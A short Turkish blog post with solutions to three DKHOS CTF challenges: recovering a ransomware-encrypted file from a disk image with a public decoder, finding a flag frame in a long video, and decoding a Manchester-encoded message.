Wed, 14 Feb 2018 00:00:00 +0000

Merhaba bu yazıda Snorlax ismi ile katıldığımız ve 15. olarak tamamladığımız DKHOS CTF’deki bazı soruların çözümlerini paylaşacağım.

Forensic 500 (Son Parça)

Soruda “for500.img” ve “bb3490207fffb173610c724fed93c0eb3368804d” isimli dosyalar verilmişti. for500’ü R-Studio isimli veri kurtarma programı ile açınca home isimli kullanıcının masaüstünde “1.R4A” adlı dosya olduğunu gördüm. R4A uzantısını biraz araştırınca “7even-HONE$T” isimli ransomware’a ait olduğunu öğrendim. Github’da bulduğum decoder ile decrypt edince içinden flag.zip çıktı.

Flag.zip dosyasını açmaya çalışınca hata verdi. Sorudaki diğer dosya üzerinde aynı işlemi denedim ve sonuç.

Karanlıkta arayış başlar

Soruda 6 saat uzunluğunda bir video vardı. strings aracı ile bakınca işaretli saniyede flag.jpg olduğunu gördüm.

3984383208960000f254016000000d

f den önceki kısım frame sonraki d’ ye kadar olan kısım ise saniyedeki frame. 3984383208960000/254016000000=15685,56

Sony Vegas yazılımı ile o saniyeye gidince flag karşıma çıktı.

Tamirci Pala Remzi

Videodan “Manchester Code” ile şifrelendiğini anladık.

https://www.dcode.fr/manchester-code adresinden decode ettiğimizde binary olarak verdi. Binary’yi ASCII’ye çevirince “_?NiSiM_riZaH_royilSaB_” çıktı. Tersine çevirince flag ortaya çıktı.

Tüm soru çözümleri Prodaft tarafından yayınlandı.